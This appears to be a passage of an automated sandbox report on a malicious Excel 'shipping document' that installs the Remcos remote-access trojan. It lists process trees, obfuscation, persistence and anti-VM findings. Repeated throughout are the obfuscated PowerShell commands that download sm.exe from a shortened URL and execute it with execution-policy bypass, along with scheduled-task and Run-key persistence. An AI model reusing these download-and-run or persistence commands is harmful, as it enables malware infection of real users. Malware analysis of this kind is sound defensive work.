                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
                Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp362D.tmp'
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp'
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp915.tmp'
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Process created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp362D.tmp'
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Process created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2120752500.0000000002AB0000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2157363185.0000000002890000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2183380304.000000001B880000.00000002.00000001.sdmp

                Data Obfuscation:

                .NET source code contains potential unpacker
                Source: kXLgfvFKbJs.exe.12.dr, IllogicalCallContext/IWinRTClassActivator.cs | .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 12.2.sm.exe.d0000.0.unpack, IllogicalCallContext/IWinRTClassActivator.cs | .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 12.0.sm.exe.d0000.0.unpack, IllogicalCallContext/IWinRTClassActivator.cs | .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.sm.exe.d0000.0.unpack, IllogicalCallContext/IWinRTClassActivator.cs | .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.0.sm.exe.d0000.0.unpack, IllogicalCallContext/IWinRTClassActivator.cs | .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 16.0.sm.exe.d0000.0.unpack, IllogicalCallContext/IWinRTClassActivator.cs | .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 16.2.sm.exe.d0000.0.unpack, IllogicalCallContext/IWinRTClassActivator.cs | .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 17.0.sm.exe.d0000.0.unpack, IllogicalCallContext/IWinRTClassActivator.cs | .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 17.2.sm.exe.d0000.0.unpack, IllogicalCallContext/IWinRTClassActivator.cs | .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: remcos.exe.18.dr, IllogicalCallContext/IWinRTClassActivator.cs | .Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Obfuscated command line found
                Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 18_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 12_2_0047B6D4 push ebp; retf
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 12_2_047A3F51 pushad ; ret
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 12_2_047A3FA1 push ds; ret
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 18_2_00413ED0 push eax; ret
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: 22_2_004FB6D4 push ebp; retf
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: 22_2_043A3F51 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: 22_2_043A3FA1 push ds; ret
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: 23_2_0029B6D4 push ebp; retf
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: 23_2_02253F51 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: 23_2_02253FA1 push ds; ret
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: 27_2_00413ED0 push eax; ret
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: 29_2_0039B6D4 push ebp; retf
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: 29_2_04393F51 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: 29_2_04393FA1 push ds; ret
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: 34_2_00413ED0 push eax; ret
                Source: initial sample | Static PE information: section name: .text entropy: 7.0583311357

                Persistence and Installation Behavior:

                Drops PE files to the document folder of the user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\sm.exe
                Drops PE files with benign system names
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 18_2_0040D4E5 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | File created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | File created: C:\Users\user\AppData\Roaming\kXLgfvFKbJs.exe

                Boot Survival:

                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp'
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 18_2_00411700 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Remcos
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 18_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                Source: Shipping Document PLBL003534.xlsStream path 'Workbook' entropy: 7.91814259565 (max. 8.0)

                Malware Analysis System Evasion:

                Yara detected AntiVM_3
                Source: Yara matchFile source: 0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.2260417476.0000000002275000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2233130392.0000000002391000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.2260325440.0000000002201000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2233337169.00000000021FF000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2233279859.00000000021A1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2198158446.00000000022F3000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2233190842.00000000023C2000.00000004.00000001.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV0